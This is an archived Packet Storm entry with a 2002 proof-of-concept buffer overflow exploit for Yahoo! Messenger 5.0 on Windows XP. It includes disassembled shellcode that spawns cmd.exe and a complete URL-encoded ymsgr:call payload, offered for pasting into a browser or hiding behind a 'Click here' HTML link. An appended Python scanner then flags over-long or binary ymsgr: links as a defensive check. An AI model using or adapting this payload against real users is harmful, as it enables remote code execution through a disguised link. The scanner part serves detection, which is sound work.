ymxp.txt

Date: 03 Jun 2002 | Reported by: sk | Type: packetstorm | Source: packetstormsecurity.com

Buffer overflow exploit for Yahoo Messenger that spawns a command prompt on Windows XP Pro.

Code
`Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro  
  
Intro:  
Proof of concept code for YM Buffer Overflow as discovered in:  
http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt  
  
Code flow:  
Overwrite EIP at 218  
Point EIP to a "RET" in memory  
"RET" jumps to beginning of shellcode  
Shellcode spawns cmd.exe  
Terminate YM gracefully :)  
  
'shellcode':  
  
55 push ebp  
54 push esp  
5D pop ebp  
33 FF xor edi,edi  
57 push edi  
C6 45 FC 63 mov byte ptr [ebp-04h],'c'  
C6 45 FD 6D mov byte ptr [ebp-03h],'m'  
C6 45 FE 64 mov byte ptr [ebp-02h],'d'  
57 push edi  
C6 45 F8 03 mov byte ptr[ebp-08h],3 ;Max window  
8D 45 FC lea eax,[ebp-4h]  
50 push eax  
B8 7E684C67 mov eax,7E684C67h ;CreateProcess@77E684C6h  
C1 C8 04 ror eax, 4  
FF D0 call eax  
B8 7EB854B7 mov eax,7EB854B7h ;FatalExit@77EB854Bh  
C1 C8 04 ror eax, 4  
FF D0 call eax  
  
Test:  
Paste this into your IE browser:  
ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77  
  
Or put this into an HTML file  
<a href="ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77">Click here</a>  
  
  
  
  
  
Fix:  
Update YM at http://messenger.yahoo.com/  
  
Credit:  
[email protected]  
31 May 2002  
`
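
Defender-side check for the vector described above, as an added example that is not part of the original advisory: it scans HTML, mail bodies or proxy logs for `ymsgr:` links whose decoded argument is over-long or carries raw binary. The 200-byte limit (chosen below the 218 the advisory gives), the function name and the sample links are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: the advisory puts the EIP overwrite at 218, so any handler
# argument approaching that length is treated as suspicious.
MAX_ARG_BYTES = 200

# ymsgr: URIs as they appear in HTML attributes, mail bodies or proxy logs.
YMSGR_RE = re.compile(r"ymsgr:([a-z]+)\?([^\s\"'<>]*)", re.IGNORECASE)


def inspect_ymsgr_links(text):
    """Return one finding per ymsgr: URI, with the reasons it looks unsafe."""
    findings = []
    for match in YMSGR_RE.finditer(text):
        command, raw_arg = match.group(1).lower(), match.group(2)
        # Decode %XX escapes so the check sees the bytes the handler receives.
        arg = unquote_to_bytes(raw_arg)
        reasons = []
        if len(arg) > MAX_ARG_BYTES:
            reasons.append("argument is %d bytes (limit %d)" % (len(arg), MAX_ARG_BYTES))
        # A screen name or chat target is printable ASCII; raw binary is not.
        if any(b < 0x20 or b > 0x7E for b in arg):
            reasons.append("argument contains non-printable bytes")
        if reasons:
            findings.append({"command": command, "length": len(arg), "reasons": reasons})
    return findings


# Constructed samples (inert filler, not the payload from the advisory).
SAMPLE_HTML = (
    '<a href="ymsgr:sendim?alice_example">chat</a>\n'
    '<a href="ymsgr:call?%01%02' + "a" * 230 + '">Click here</a>\n'
)

if __name__ == "__main__":
    for finding in inspect_ymsgr_links(SAMPLE_HTML):
        print(finding["command"], finding["length"], "; ".join(finding["reasons"]))
```

The same two conditions can be applied at a mail gateway or web proxy to strip or quarantine such links for hosts that have not yet applied the update named under "Fix".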
